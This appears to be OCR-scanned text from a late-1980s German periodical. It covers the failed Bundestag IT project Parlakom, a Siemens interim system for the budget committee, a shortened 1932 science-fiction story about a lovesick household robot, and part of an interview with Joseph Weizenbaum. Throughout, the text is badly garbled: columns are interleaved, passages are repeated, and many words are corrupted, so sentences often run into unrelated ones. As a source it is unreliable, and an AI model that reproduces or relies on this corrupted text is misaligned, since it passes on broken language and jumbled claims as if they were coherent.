ments erstellt. Alles wollte man besser als andernorts in der öffentlichen Verwaltung machen, doch das Ergebnis arbeiten auf
ist am Ende ein Desaster, wie es noch keine Verwaltung alleine fertiggebracht hat. Der de-facto Abbruch der während die CDu7cS^ I
informationstechnischen (IT) Aufrüstung des Parlaments führte zu allem Überfluß zu neuen Kuriositäten. Der cingeschworen ist ^ ^ ’^Vang
Haushaltsausschuß beschäftigte sich mit der IT-Schlappe, sperrte dann jedoch allen Bundesressorts vorerst 20%
derlT-Haushaltsmittel. Gemeint können die Volksvertreter nur ihre eigene Administration und auch sich selbst ging ^ .
haben, "bestraft’ haben sie nun aber andere, die Bonner Ministerien und den nachgeordnelen Bereich. Beratungsgesellschaff'^" Karl'
Für sich selbst haben die Haushäl- zwischen dem Wang APC, dem nicht. Ein schlechtes Vorbild für die einer altcrnat^en
tcr eine Interimslösung von Sic- Ni.xdorf Micro 3 (im WahlkrcisbU- gesamte öffcnlllche Verwaltung, ,™PPe>auch Jv}:,
mens ins Auge gefaßt (siche hierzu ro) bzw. dem Micro 4 (im Bonner denn alle Parteien weisen tinermüd- einschlägig bekannten'
eigenständiger Artikel). Für die Büro) oder einem Siemens PC-D. lieh öffentlich auf die Bedeutung, ^^“« ‘'O'nputer Club’ angehör
Abgeordneten-Kollegen und deren Jeder zweite Abgeordnete wollte der Mitbestimmung bei der Einfüh-j a? zu ganz anderen
Kommunikation mit der Verwal- Jedoch lieber an einem Siemens rung neuer Technologien hin. Nurr'«''’^®"-empfahlen ein«!
ter eine Interimslösung von Sic- Ni.xdorf Micro 3 (im Vrahlkrcisbü-
mens Ins Auge gefaßt (siche hierzu ro) bzw. dem Micro 4 (im Bonner
eigenständiger Artikel). Für die Büro) oder einem Siemens PC-D.
Abgeordneten-Kollegen und deren Jeder zweite Abgeordnete wollte
Kommunikation mit der Verwal- Jedoch lieber an einem Siemens
lung gehl cs crsimal auf herge- Bürosvstem 5800, einer Nizdorf
brachte 'Technik zurück: Telefax T'tl#';' ’-C
und'l'clctex. Die Bundespost - mo- '
dernistischen Vokabeln bedeuten nA" •' ^
einfach l-'crnkopierer und clektro- j
iscli aufgcniülzer Imrrisrhreiber
;el). Helfen soll eines Tages das x- 1
-DO l’rotükoll, eine Software-gc-
. .ützte Kompntibililät.srcgclungj'ür |,
Jeriilc verscliiedcncr Hersteller, ™ .
iiiit deren Betrieb frühestens Mitte
1989 zu rechnen ist. Bll lli I fI W&.
Für die meisten zu Beginn gestarte- Abgeordnete auf der EDy-Schidba
len 17 Inleres.senten kam jedoch des Bundestages, frri Bild vorne rechts Dr. Beier Milz.scherling (SI’D
bercils nach einer ersten Sichtung Berlin) und hinten links Karsten Vogl (Frankfurt).
der Angebote aufgrund mangeln- gg^Q Konfiguration oder einer die SPD zog spater mit einer
der Qualilät.s-und Leistungsmerk- v/ang U.S 65 Anlage arbeiten. Ganz ’Dicnstvcrcinbarung’ nach, aller-
malc das vorzeitige Aus. Lediglich glücklich wurden die parlamenlari- dings erst nachdem die Mitarbeiter
Nixdorf, Wang und Siemens konn- sehen Tester jedoch nicht mit ihren im Dezember 1986 eine Art Streik
ten sowohl staiid-aloiie PCs al.s „cuen Arbeitshilfen. Das Nixdorf orttanisiert hatten.
auch ein Mchrplatzsyslcm im Bun- ---
destag plazieren. Die Parlamcnta- ft
rier hatten daher nur noch die Wahl 5
dic Grünen hatten bereits im Vor-i"^ ^‘^'y'u'unikationseinheitf,^*^^*'"
Fraktionen mit eigene,«
eigener Netzkonirolle aus
„ Umstritten war das
a J'' Grünen
von den kritischen Selbst
^ sung akzeptiert, verzichtete
Ml ‘eiEndeI986 ganzaufdieTw*''''‘-
Vor allem aber das
privatwirtschaftlichen
K'^nzept der
Abgeordnete auf der FDV-Schuihank im Farlakom-Schuiungszenlnim '^ung durch die ADV-Orga
Ins Dr. Beter Mitz.scheriing (SBD ^ b'uehte. Offensichtlich ®
t (Frankfurt). Volksvertreter «t u'
j. cdtv ■■ mit dem notwendigen Ernst h,.- .
die SPD zog spater mit Sache. Die Kosten werden i *
Dienstvereinbarung nae . aller-die beteiligten Unternehmen
ding^s erst nachdem die Mitarbeiter auch die Bundestagsverwaltun»
im Dezember 1986 eine Art Streik
organisiert hatten.
. ter der Rubrik Erkenntnis
eben müssen.
verbu.
HAI
« , , , , , . ,, Zauberwort im Hohen R,.
Auch der unabhängige Daten-heißt „un x-400 Protokoll
schmzbeauftragte. den die Kom-Software-Lösung, von der man
mission des Ältestenrates empfoh- Wunder erhofft, ist in der
len hatte, blicb lediglich ein Kommunikation unterschiedUnL
Wunsch. Mankonntcsich nicht auf Systeme zu gewährleisten.
die notwendigen Kontroll- und Problem: die internationalen
Entscheidungsbefugnisse sowie mierungsgremien formulieren n«,
über die Personalausstattung cini- bis mindestens Herbst 1988
gen. Stattdessen wurde ein Daten- neuen Standard. Dann erst Wer^^***
Schutzgremium eingesetzt, dem ne- die Hardware-Produzenten Gerj^"^
ben je einem Vertreter der beteilig- umstellen und liefern können,
ten Fraktionen ein Mitglied der wird also noch dauern bis '
Bundesverwaltung angehört. Auch MdB’s auf die mittlerweile sch«^
die gesamte Konzeption des offe- beliebten Schachspiele und pj
nen Netzes war von Anfang an Zeugsimulationen Zugriff Erhaltg^
Welt-Centrum Büro
16 . - 23
m
„Parlakom ist gescheitert", so Bun¬
destags-Direktor Dr. Jo.seph Bü¬
cher im Rundschreiben. Hier mit
Präsident Philipp Jerminger. Foto:
Interimslösung für Haushaltausschuß
Siemens vermietet Provisorium
BS/rup) Offiziell als Bestandteil von Parlakom — wenn er Versuch des
Parlaments elektronisch zu kommunizieren auch vorerst suspendiert ist
— hat Siemens es geschafft dem Haushaltsausschuß eine provisorische
Kommunikationseinrichtung zu verkaufen. Jährlich fallen hierfür
130.000 DM zuzüglich für Personalkosten 190.000 DM an. Damit der
HaushaltsausschuB aber auch die Haushaltsreferate der einzelnen Res¬
sorts erreichen kann, müssen diese mit weiteren Kosten von fas einer
iulben Million Mark rechnen. Vorgesehen ist, daß der Haushaltsaus-
ichuß die Tagesordnung in die einzelnen Büros der Haushälter elektro¬
nisch versenden kann. Der Rest der Kommunikation zwischen Bundesmi-
nislerien, insbesondere dem Bundesfinanzministerium, dem Bundesfi¬
nanzamt sowie dem Bundestag und denWahlkreisbUros der Abgeordne¬
ten soll mit Teletex der Bundespost erledigt werden (siehe hierzu
»esonderten Artikel).
ordneienhochhauses ein Benutzer
Service Zentrum eingerichtet ha¬
ben, beheben helfen. Bei einem Be¬
such in den Büros schauten sie den
Parlamentariern auch schon mal
bei der täglichen Arbeit über die
Schulter, um vor Ort erste Hilfe zu
leisten. Anwendertreffen und die
hausinternen BSZ-News dienten
dem Erfahrungsaustausch. Aufge¬
sucht wurde das Benutzerzentrura
durch MdB’s und Mitarbeiter je¬
doch kaum. Auch von Firmen zu¬
sätzlich eingerichtete Vorführ-ln-
stallationen in umliegenden Woh¬
nungen und Büros blieben leer. Die
Leitung des IT-Versuchs oblag zu¬
dem Germanisten und Politologen.
DV-Fachleute und Mitarbeiter des
hauseigenen wissenschaftlichen
Dienstes — der den MdB’s in Zu¬
kunft per EDV zuarbeiten sollten
— waren nicht beteiligt. Auch die
Vorsitzende des mit dem IT-Kon-
zept bescliäftigtcn Ältestenrates,
spöttiscli nur Tripplc-S’ genannt,
konnte die Interessengegensätze
nicht begleichen. Sie selbst mußte
sich sogar Vorwürfen wegen per¬
sönlicher Interessenkonflikte stel¬
len, da auch ihr Mann für die GMD
mit Parlakom beruflich zu tun hat¬
te.
Vueh die Ressorts müssen kräftig
lachrüsten, denn im Regelfälle ver-
ügen die Bonner Ministerien je-
veils nur über einen Teletex-An-
chluß. bis Juni soll hier nachge-
chafft werden. Verschlußsachen
Verden von dieser Kommunikation
tusgeschlossen.
Das schmale Ziel dieses Proviso-
iums soll sein, daß die Mitglieder
les Haushaltsausschusses sowohl
tuf ihrem Bonner- wie auch ihrem
Vahlkreisbüro über Datex-P-Lei-
ungen mit ihrem Tcletex-Gerät die
Vusschußunter lagen, Protokolle,
Beschlüsse und Tagesordnungen
ibrufen können, die in der Siemens
äS-2000-Anlage gespeichert sind.
\us dem Bundcsinnenminislerium
vird eine gewisse Skepsis gegen-
iber dieser Lösung nicht geleugnet,
lenn das Fehlen jeglicher Recher-
:hicrmöglichkeit und das gleichzei-
■ig recht umständliche Kommuni-
tationsverfahren über Teletex las-
:en eine wirkliche ausschußgerech-
c Nutzung dieser Angelegenheit als
caum wahrscheinlich erscheinen.
\usgehend von der Aufgabe eines
Taushaltsausschuß-Mitgliedes,
tonnte eine vernünftige Datenver-
irbcitung nur dahingehend atisse-
len: Bundcstagscigcncr Großrech-
ler, der genügend Kapazitäten hat,
jm nicht nur den aktuellen, son-
Icrn auch die Bundeshaushalte der
elzten Jahre sowie die Landes-
»aushalle zu speichern. Zur Kon-
rollc der Subventionspolitik der
Bundesregierung braucht jeder
Software Paket Nios-Top konnte
nicht störungsfrei auf dem Micro
PC implementiert werden. Auf dem
Wang APC unter Wang MS-Dos
und XENIX konnten trotz Emula¬
tionskarte nicht alle Programme
zum Laufen gebracht werden und
die So-Schnittstelle für den OSI-
Slandard war nicht kompatibel.
Aufirctende Probleme bei der Ar¬
beit sollten die Fachleute der ADV-
Orga, die im 11. Stock des Abge-
Haushälter Einsicht in die Landes¬
haushalte, Zur Verschiebung von
Ausgabeposten muß er Einblick in
alle Einzelheiten haben können und
dies auch rückwirkend. Nur ein
großes weh platzfähiges System für
den Ausschuß angeschlossen an
den Großrechner wäre sinnvoll.
Mit der jetzigen Lösung ist zwar
eine luxeriöse Bequemlichkeit und
ein weiteres Imponiergerät in den
Abgeordneten-Büros sicher, doch
gleichzeitig eine nur passive Nut¬
zung eines geringen Information¬
angebotes möglich.
Einfacher hat da der Forschungs¬
ausschuß des Bundestages, dessen
Mitglieder vom gleichen Hersteller
PC’s zur Verfügung gestellt bekom¬
men haben. Abgeordnete anderer
Ausschüsse vermuten schon, der
große Siibventionsempfenger in
Sachen Mega-Bit-Chip Entwick¬
lung der die Sieuergelder letztlichh
nicht zur deutschen Entwicklung
sondern zum japanischen Lizenz¬
kauf nutze — habe den For-
schungsausschußmitgliedcrn die
Geräte deswegen kostenlos zur Ver¬
fügung gestellt, damit diese den
Weg der Subventionsmillionen im
Konzern be.sser verfolgen könnten.
Die Sache hatte bereits Kreise gezo¬
gen, da Bundestagspriisident
Philipp Jenningcr Ende letzten
Jahres in einem Brief an die Abge¬
ordneten ausdrücklich darauf hin¬
wies, daß nur Geldspenden in der
Steuererklärung angegeben werden
müßten.
Die Mitarbeiter der Abgeordneten
waren weniger erfpeut über die neue
Technik am Arbeitsplatz, denn für
sie setzt sich weder der Personalrat
des Bundestages noch derjenige der
Fraktion ein. Sie haben nämlich
alle privatrechiliche Verträge mit
’ihrem’ Abgeordneten. Einen ar¬
beitsrechtlichen Status und damit
ein Mitbestimmungsrecht gibt es
feld eine ’Betriebsvereinbarung’ mit
ihren Mitarbeitern abgeschlossen, -..
ABGEORDNETE AUF DRAHT: Die Mitglieder des Deutschen Bundestages — gleich
welcher Couleur — werden in Zukunft alle dieselben .Informationskanäle* haben; ein
weltweit beispielhaftes InformatlonB- und Kommunikationssystem soll demnächst in
einheitlicher Technik alle 530 Abgeordneten, die Ausschüsse, Fraktionen, wissen¬
schaftliche Dienste und die Bundestagsverwaltung miteinander verbinden. Über die
.Nervenstränge* des Systems, das in den nächsten zwei Jahren aufgebaut werden soll,
gehen gleichormaSen Sprache. Text, Bild und Daten nach dem künftigen internationa¬
len Fernmeidastandard ISDN (Integrated Services Digital Network). Das Kommunika¬
tionssystem Hicom, das diese Infrastruktur zur Verfügung stellt, vermittelt auch den
Zugang zu Oatenbariken, zu einem internen Btx-Infonmatlonssystem und enthält elek¬
tronische .Briefkästen* für hinterlegte Text- und Sprachinformationen. Ob ds® Projekt
.Parlakom* die Kommunikation der Parlamentarier untereinander verbessert, ist offen.
Entscheidend ist. daß das geplante System mit einem .offenen* Industriestandard
(OSI) den Anschluß von Geräten verschiedener Hersteller zuläßt. Neben dem Telefon
sind es vor allem Personalcomputer und Bürosysteme für die Text- und Datenkommu¬
nikation oder auch .multifunktionale* Geräte, die — mit Tastatur, Bildschirm und Tele¬
fonhörer — für sämtliche Kommunikatlonsarten einzusetzen sind. Die Abgeordneten,
Fraktionen und Ausschüsse können sich also entsprechend Ihren eigenen Vorstellun¬
gen zusätzlich technisch ausstatten. Eine praktische Unterweisung der verschiedenen
Möglichkeiten führt der Hersteller bereits jetzt in seinem Bonner Fachberaterzentrum
durch. PR3-2-J? (FR-Blld: Siemens)
Hilfe, unser Roboter ist
liebeskrank!
Er massiert die Hausfrau. Er trinkt den
Cognac des Ehemannes. Er versucht die
Witwe Lumidatsch im Treppenhaus zu küs¬
sen. Und schließlich wird erlebensmüde. —
Eine sentimentale Science-fiction-story, von
uns leicht gekürzt, die Friedrich Kroner
schon 1932 ersann ., ^
2
W ' ir harten jahrelang einen
sogenannten Fußboden-
Roboter gehabt, ein klei¬
nes, murksiges Ding. Er kehrte
den Boden, wusch ab, kochte ganz
gut und half meiner Frau auch mal
beim Anziehen. Aber er war acht
Jahre alt, und er schnaufte doch
schon stark, und es rasselte in sei¬
nen Gelenken, Ehe man so einen
Roboter zum Überholen in die Fa¬
brik schickt, dann schon lieber
weg! Wir kauften uns also einen
neuen Roboter, einen Superfix.
Als er nach dem Kauf in unserer
Wohnung ankam und kaum drei
Atemzüge getan hatte, sagte er
schon ün mißbilligendem Ton;
„Staub, viel Staub.“ Er sah sich
kopfschüttelnd in der Küche um,
machte sofort das Fenster auf und
setzte den Ventilator in Gang,
dann lüftete er den Deckel des
Mülleimers und sagte mit der Stim¬
me in Moll: „Schweinerei!“ Wir
ließen ihn in der Küche zurück.
Meine Frau gab ihm Anweisungen
für den nächsten Tag.
Er funktionierte aber wirklich ganz
hervorragend. Vor allem hatte die¬
ses schreckliche Rasseln und Keu¬
chen in der Wohnung aufgehört.
Es wurden keine Türen mehr ge¬
worfen. Die ganze'Arbeit ging mit
einer Präzision und Geräuschlosig¬
keit vor sich, daß man manchmal
verwundert daneben stand und
staunte. Und als Masseur war er
große Klasse. Meine Frau war rest¬
los begeistert!
Auch ich war mit ihm sehr zufrie¬
den. Er staubte meine Bibliothek,
die über 2000 Bände enthält, mit
einer Akkuratesse und Schnellig¬
keit ab, wie kein Mensch es imstan¬
de gewesen wäre. Aber nach eini¬
gen Monaten merkte ich den
Grund für seine Leidenschaft, in
meinem Zimmer aufzuräumen.
Eines Abends, als wir aus dem
Theater nach Hause kamen, lag er
total betrunken, man kann schon
sagen, sinnlos betrunken, im Klub¬
sessel, eine völlig geleerte Kognak¬
flasche neben sich. Wir telefonier¬
ten noch in derselben Nacht mit
dem Arzt, ich wollte sagen, Inge¬
nieur. Er kam auch, besah sich den
Schaden und fand schließlich einen
Defekt in der oberen rechten
Schulterkammer. Ein kleiner, win¬
ziger Draht hatte sich aus dem
Kontakt zur Kopfschaltung gelok-
kert, und damit schien der Schaden
beseitigt. Zwölf Stunden lag unser
Roboter wie ein Toter und pumpte
seinen Raitsch aus. Dann machte
er wieder seinen Dienst so gewis¬
senhaft wie vorher. Aber acht Ta¬
ge später, an einem Sonntagnach¬
mittag, als unser Roboter seinen
Ausgang hatte, war er in ein Tanz¬
lokal eingedrungen, obwohl den
Robotern der Eintritt in alle öf¬
fentlichen Lokale streng verboten
war, hatte dort ein junges Mäd¬
chen einfach um die Hüfte genom¬
men und mit ihr zu tanzen begon¬
nen, dabei hatte er fünf Personen
umgeworfen sowie einen Tisch mit
vier Tassen Kaffee und drei Tor¬
ten, die wir samt dem Geschirr
bezahlen mußten. Wir waren ge¬
zwungen, ihn am anderen Morgen
von der Polizei abzuholen.
Als wir unseren Roboter von der
Polizei herausbekommen hatten,
gab es eine sehr ernsthafte Ausein¬
andersetzung mit ihm. Meine Frau
nahm ihn ins Gebet. „Julius“, sag¬
te sie, „du bist so klug, du hast so
gute Manieren, weiß der Himmel,
wenn die Fabrik imstande wäre.
Meine Frau sah mich an, ich sah
meine Frau an. Der Roboter blieb
im Sessel sitzen, starrte uns mit
Dänen in den Augen an und sagte:
„Sie wohnt nicht hier im Haus. “
deine Fehler abzustellen, wir wür¬
den dich wie ein Kind ira Hause
halten.“ Solche Redensarten nutz¬
ten natürlich gar nichts. Julius ver¬
sprach, gelobte Besserung. Und
cfie nächsten 14 Tage saß er auch,
wenn er nichts zu tun hatte, nach¬
denklich und still auf dem Küchen¬
stuhl und starrte zur Decke.
Schließlich dachte ich, schicke ihn
doch mal zum Psychoanalytiker.
Vielleicht findet der einen Kom¬
plex, den sein Ingenieur in ihn
hineingebaut hat. Ich schrieb an
die Fabrik einen energischen
Brief, ich zählte alle Zwischenfälle
mit Julius auf. Das Ergebnis war,
daß der Chefingenieur kam, der
Julius 14 Tage vorher überprüft
hatte, Julius erkannte ihn auch so^
fort wieder. Er fiel ihm um den
Hals und begann zu weinen. Es
war eine peinliche Situation. Der
Chefingenieur entschuldigte sich,
schrie ihn an und befahl ihm, sich
auf die Chaiselongue zu legen.
Dann begann er ihn abzuklopfen
und abzuhorchen, schaltete jede
Brustkammer einzeln aus, ja,
schließlich öffnete er sogar die
Kopfkamraer, Plötzlich schrie er
überrascht. „Ah!“ und holte mit
einer Pinzette eine mikroskopisch
kleine Spirale heraus, die sich viel¬
leicht gelockert hatte oder gar
nicht hineingehörte, dei^ er warf
sie einfach in den Papierkorb. In
Ordnung“, sagte er und-schaltetc
Julius wieder zu. Auch. Julius
schien zufrieden. Er saß aufrecht
starrte seinen Konstrukteuj- jjjjJ
verklärten Augen an: „Besser; viel
besser“ - „Na also“, sagte der
Chefingenieur und ging.
Von diesem Tag an war Julius wie
verwandelt. Er tat zwar seine Ar¬
beit gewissenhaft und geräuschlos
weiter, aber sein Blick war abwe¬
send. Meine Frau, mit denj Tn.
stinkt ihres Geschlechts, fragte ihe
besorgt: „Ist dir etwas, Julius"?“ -
„Oh, nichts, gnädige Frau“ 'flii!
Sterte er und blickte verklärt rar
Decke. ™
Eines Tages überraschten -wir Ju-
lius: In einem Sessel sitzend »jn
Buch in der Hand, Tränen in
Augen und Verse gegen die DeSe
flüsternd, die er auswendig
Es waren Liebesgedichte.
sah und hörte uns nicht. Wir « *
den sprachlos in der Tür. s: w-
Bescherung. Wir hatten “
mal, ich weiß nicht, ob ir-K ^
erwähnt habe, vor zwei *
der Witwe Lumidatsch eine S
zahlen müssen, weil unser v r
rfe auf dem Treppenabsatz
Tadle gefaßt und versucht^^*
sie abzuküssen. hatte,;..
Meme Frau sah mich an iot,
meine Frau an. Der Roboter Kril -
un Sessel sitzen, starrte hlielJ p
Tranenmden Aueenani,
Angst sh? i
mcht hier im Haus “ ® ® '^ohnt 1
Wir lagen die ganze Nacht I
los und besprachen die schlaf-1
wir aufwachten, war e^^'^he. Alst
mittags. Kein Frühstück^^'^ Ul» I
ne summende Kaffeema, r I
schweige die Meldung- 8«*
stück ist angerichtet “ v ^rüh-
in der Küche. Die
Korridortür waren dur^®*
Briefschlitz nach innen h?** <1®® I
warfen Wir hätten uns
gemacht, wenn wir in den
gen inseriert hätten: „Julius
zuruck. *
Den wirklichen Grund, wan,.., „
hus uns verließ, haben
geahnt: Er war lebensüberdr.-"**** -
Er suchte seinem Leben ein r 1
zu machen, und wie raffinip
vorging, wie er die An des **
mordes überdacht haben muß u
weist sein Ende, das wir auc’ ^
Zeitung erfuhren.
Julius war der vollkommenste
boter, der jemals gelebt hat
ging in eine Eisenwarenhaudi, -
und verlangte ein Dutzend ^hj^8 *
benzieher und Schraubens«^^'**
sei. Damit ging er auf einen
derspielplatz im Park, setzte
unter eine Gruppe halbenvach***
ncr Lümmels und sagte: „Juj,^*.
mir ist nicht ganz gut, seht h-S’
mal nach, was mir fehlt.“
Nach dem Bericht der Zeitun» r,
es keine Stunde gedauert, bis
eine Schraube mehr an unse,i”l
Julius in ihrem Gewinde saß.
I
Joseph Weizenbaum:
“Die Technik in die Schranken weisen”
Der Weg ist das Ziel! / Ein Interview
Im deutschen Sprachraum wurde Joseph Weizenbaum (geboren 1923 in Berlin, 1936 emigriert in die;
USA, Professor für Informatik am Massachusetts Institute for Technology, MJ.T.) bekannt durch
seine Bücher “Die Macht der Computer und die Ohnmacht der Vernunft” (Frankfurt 1977) und
“Kurs auf den Eisberg” (Zürich 1984). Unermüdlich weist Weizenbaum auf die Grenzen der Techno¬
logie hin und warnt vor der Gefahr, die sich aus einer ungebremsten Entwicklung von Wissenschaft
und Technik ergeben kann. — Im nachfolgenden Gespräch geht es um das historische, kulturelle und
soziale Umfeld einer Zivilisationsentwicklung, die in der elektronischen Datenverarbeitung einen Kul¬
minationspunkt erreicht. Das Gespräch führte Markus Schmidt; es fand im Haus der Familie Dom-
zalski (Dorothea und Leo Domzalski sowie ihre Söhne Adrian und Oliver Thomas) in Berlin statt, die
sich ebenfalls an dem Gespräch beteiligten.
Mit freundlicher Genehmigung dem INFO 3 Magazin entnommen
Zyange, bevor Weizenbaum mit seinen Büchern
ein breites Publikum erreichte, hatte er bereits
einen Namen in der Fachwelt: Mit dem J965 ge¬
schriebenen Computerprogramm "Ehza erregte
er einen Sturm der Entrüstung und des Erstau¬
nens. Mit “Eliza” wollte Weizenbaum beweisen,
daß der Computer eines nicht kann; den Men¬
schen als Gesprächspartner des Menschen erset¬
zen "Eliza” ist ein sogenanntes “dialogiähiges
Programm: Dem “Gesprächspartner” am Terini-
nal wird vorgetäuscht, der Computer verstehe
seine Aussagen oder Fragen, ja als könne die Ma-
schine durch ihre pseudoverständnisvollen Rück¬
fragen dem menschlichen Gegenüber in seinen
seelischen Problemen helfen.
Das Experiment “Eliza” schlug fehl. Allerdings
nicht etwa, weil das Programm nicht funktioniert
hätte - im Gegenteii: Viele Menschen glaubten
an die autonome “Macht der Computer” und
waren bereit, der Maschine ihre seelischen Proble¬
me zu unterbreiten. Der Computer ist geduldig.
Er steht nicht auf und geht weg, vor ihm kann
man sich nicht blamieren. Und eine Reihe von
Joseph Weizenbaums Fachkollegen meinten be¬
geistert, endlich den elektronischen Psychothera¬
peuten gefunden zu haben, der auch mehrere
“Patienten” gieichzeitig “behandeln” könne. Es
war vor allem diese Erfahrung - wie leicht Men¬
schen bereit sind, sich der Autorität der Technik
zu unterwerfen —, die Joseph Weizenbaum zum
Im amerikanischen Innenleben ist von den Intha-
nem tatsäclüich sehr wenig übriggeblieben: eimp
völlig veräußerlichte Feste oder Riten - Tatsache
ist aber, daß die Indianer ermordet wurden, und
zwar nicht nur im Äußeren. Darnit hängt viel¬
leicht zusammen, daß es in Amerika so gut wie
kein Geschichtsbewußtsein gibt. Das wird durch
die Medien noch unterstützt: Völlig zusammen¬
hanglos werden die Tagesereignisse nebeneuian-
dergestellt - ein Sportereignis neben ein
Eisenbahnunglück in Kalkutta. Wenn zum Bei¬
spiel Richard Nixon in den Medien erwähnt wird,
kommt mit Sicherheit der Zusatz: “formet Pre¬
sident of United States”, weil man emfach nicht
davon ausgehen kann, daß das jemand weiß.
Die indianische Kultur ist im allgemeinen nur
noch Entertainment für die amerikanische Be¬
völkerung. So muß sich z.B. jeder amerikanische
Präsident einmal mit einem indianischen Feder¬
schmuck fotografieren lassen. Das hat aber über¬
haupt keine Bedeutung. Eine bewußte Identifi¬
zierung findet da nicht statt. Überhaupt ist das
Bewußtsein für die indianische Kultur sehr dünn.
Man weiß von ihr, abstrakt, so abstrakt, wie man
auch die Entfernung zum Mond kennt. Das hat
mit dem Innenleben Amerikas nichts zu tun.
Selfmade-Männer
damit nicht auch die enormen sozialen Diskre¬
panzen in Amerika zusammen?
Joseph Weizenbaum: Es freut mich sehr, daß Du
das ansprichst. Du hast völlig recht: Die Verschie¬
denheit Amerikas äußert sich natürlich nicht nur
in der Unterschiedlichkeit der Straßenbilder, son¬
dern auch in den sozialen Bereichen.
Adrian Domzalski: Was mich allerdings wundert:
Diese verschiedenen sozialen Schichten lassen
sich durch dasselbe Fernsehen befriedigen.
Joseph Weizenbaum: Darauf habe ich auch keine
Antwort. Ich kann da auch nur staunen. Aber es
ist eine Tatsache: Gerade die Armen haben den
Fernseher oft als emziges “kulturelles” Angebot.
Einen alten Fernseher bekommt man schon für
zehn Dollar, ln den wohlhabenderen Schichten ■
übernimmt der Fernseher oft die Funktion des
Babysitters. Und für die älteren Kinder gibt es ja
jetzt die Videospiele. Klaus Hafner führt sie
immer als einen Fortschritt gegenüber dem Fern¬
sehen an, weil die Kinder hier nicht nur passiv
vor dem Kasten sitzen, sondern selbst aktiv wür¬
den. Ich kann darauf nur antworten: Bisher
haben die Kinder ün Fernsehen ein U-Boot ge¬
sehen, das torpediert wird, in dem Hunderte von
Menschen ums Leben kommen. Heute können sie
nun selbst diejenigen sein, die das U-Boot ab¬
schießen.
“Rufer in der Wüste” werden ließ.
Sich selbst bezeichnet Weizenbaum als Pessimi¬
sten, was die Entwicklung der menschlichen Zivi¬
lisation anbelangt; “Kurs auf den Eisberg”. Gera¬
de aus dieser negativen Zukunftserwartung aber
entwickelt er das Recht, ein Hoffender zu sein:
Nur wer eine positive Entwicklung nicht erwar¬
tet, ist imstande, sie zu erhoffen. In diesem Sinne
wendet sich Joseph Weizenbaum an seine Zeitge¬
nossen mit der Aufforderung, das “Wunder” zu
ermöglichen, welches darin besteht, das Ruder
jener “Titanic” herumzureißen, auf der er uns
mit voller Kraft dem Unteigang entgegenfahren
sieht. Ein “Wunder”, das nicht durch die Ent¬
scheidung politischer Würdenträger, sondern
durch die Verantwortung des Einzelnen bewirkt
werden kann: Wenn jeder von uns die Bereit¬
schaft entwickelt, derjenige zu sein, der das Ru¬
der herumreißen könnte, dann haben wir eine
Chance.
Markus Schmidt: Die Entwicklung der technolo¬
gischen Zivilisation in unserem Jahrhundert ist
in entscheidendem Maße von den Vereinigten
Staaten geprägt worden. Hat das vielleicht seinen
Grund darin, daß einerseits in der amerikanischen
Geistesgeschichte der europäische kulturelle Ur¬
sprung vergessen wurde, andererseits aber die ur¬
sprünglich amerikanischen Zivilisationsformen
Amerikas, die der Indianer, nicht nur nicht auf¬
genommen, sondern sogar mit massivster Gewalt
verdrängt wurden?
Markus Schmidt: Was ist dann aber das Innen¬
leben Amerikas?
Joseph Weizenbaum: Das Wichtigste am Innen¬
leben Amerikas ist, daß es sehr vielgestaltig ist,
so wie Amerika ja überhaupt sehr unterschied¬
liche Seiten hat. Es gibt keinen Oit in den Staa¬
ten, von dem man sagen könnte: Das ist das typi¬
sche Amerika. Sie sind alle völlig verschieden. Ich
lebe in Cambridge, Massachusetts und muß täg¬
lich erleben, daß ich einfach nicht weiß, was
Amerika ist.
Von einem Gesichtspunkt aus gibt es allerdings
eine “Homogenisierung” Amerikas: in der Wer¬
bung und in den Medien. So sind beispielsweise
die Hotelzimmer der “Holiday Inn"-Hotels über¬
all gleich, so daß man sich überall “zuhause” füh¬
len soll. Man kann dann nicht mehr unterschei¬
den, ob man in Chicago ist oder in Curachi. Und
auch das Fernsehen bringt überall die gleichen
Nachrichten. Das ist eine Form der “Vereinigung”
Amerikas, die völlig trivial ist, die aber doch sehr
tiefe Konsequenzen hat.
Dieses Amerika hat nichts mehr mit den Indianer¬
mythen zu tun. Es hat auch nichts zu tun mit
den Pionieren, die nach Amerika einwanderten.
Im 18., 19. Jahrhundert gab es nach Westen hin
gewissermaßen eine offene Grenze. Man konnte
seinem Schicksal entlaufen und neu anfangen.
Daher stammt die Idee des “Selfmademan”, eine
der Grundsäulen der amerikanischen Kultur.
Auf einer leider nur kurzen Reise durch die USA
hatte ich das starke Erlebnis, daß sich zwischen
Kultur und Natur in Amerika eine gewaltige
Kluft befindet. Ein anschauliches Beispiel dafür
ist San Francisco: Ohne jede Rücksicht auf natür¬
lich gewordene Landschaftsformen sind hier die
Straßenzüge einfach nach einem Rasterplan quer
über die hügelige Landschaft gebaut worden.
Joseph Weizenbaum: Ich lebe seit 51 Jaluen in
den Staaten und kann nur sagen: Ich weiß immer
noch zu wenig über Amerika, um zu einer sol¬
chen Aussage zu kommen. Ich bin mit solchen
Vereinfachungen sehr vorsichtig. Um auf Ihr Bei¬
spiel einzugehen; In Boston sind die Straßen ein¬
fach die ausgebauten Kuhpfade, auf denen ehe¬
mals die Cowboys ihre Herden getrieben haben.
Um sich in Boston zurechtzufinden, muß man
sich auskennen, da kommt man mit Rastern oder
Mathematik nicht weiter.
dieser Stelle kann man übrigens einen gewal-
m Unterschied beispielweise zur japanischen
itur feststellen; Die Sozialisierung eines neu-
orenen Kindes geht in Amerika von der Prä-
;se der völligen Hilflosigkeit des Kindes und
ler totalen Abhängigkeit von den Eltern aus.
> Erziehungsziel ist deshalb, das Kind so
nell wie möglich unabhängig werden zu lassen.
Japan ist es genau umgekehrt: Hier wird der
leling gerade in seiner völligen Unabhan^gkeit
I allen sozialen und gesellschaftlichen Bmdun-
1 gesehen, und die Erziehung soll nun bewir-
1 daß das Kind in die Gesellschaft emgebun-
i’wird. Natürlich ist das in Amerika - und ver-
itlich auch in Japan - vollkommen unbewußt:
r*. Aiifpabe der Eltern.
Dorothea Domzalski: Wese Erziehung zum seif-
mademan” - das ist doch in gewisser Weise auch
eine krasse Aufforderung zum Egoismus. Hangen
Markus Schmidt: Was Sie damit andeuten, ist
doch, daß sich der Computer aus Vorhergehendem
entwickelt hat. In Ihren Büchern haben Sie ja oft
darauf hingewiesen, daß der Computer ein Kind
des Zweiten Weltkrieges ist . ..
Joseph Weizenbaum: . . . und des Kalten Krieges!
Markus Schmidt: Wo ist nun aber der eigentliche
Ursprung des Computers zu suchen?
Joseph Weizenbaum: Mir scheint an diesem Ge¬
spräch symptomatisch zu sein, wie schnell ivir die
